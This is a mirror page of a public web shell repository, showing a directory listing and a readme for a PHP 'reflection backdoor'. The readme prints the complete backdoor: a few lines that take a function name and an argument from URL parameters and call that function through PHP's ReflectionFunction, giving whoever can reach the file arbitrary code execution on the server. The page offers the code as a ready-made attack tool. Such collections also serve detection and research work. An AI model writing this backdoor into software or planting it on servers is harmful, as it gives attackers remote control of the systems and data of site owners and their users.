mirror of
https://github.com/tennc/webshell
synced 2025-02-18 02:38:24 +00:00
.. | ||
11.jpg | ||
PHP reflection.php.txt | ||
PHP反射后门.php.txt | ||
Readme.md |
![Title alt text](/Mirrors/webshell/media/commit/9495a6c59e76b7d1ede17ca2a0e67acd5e752e0f/php/p2j/11.jpg)
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>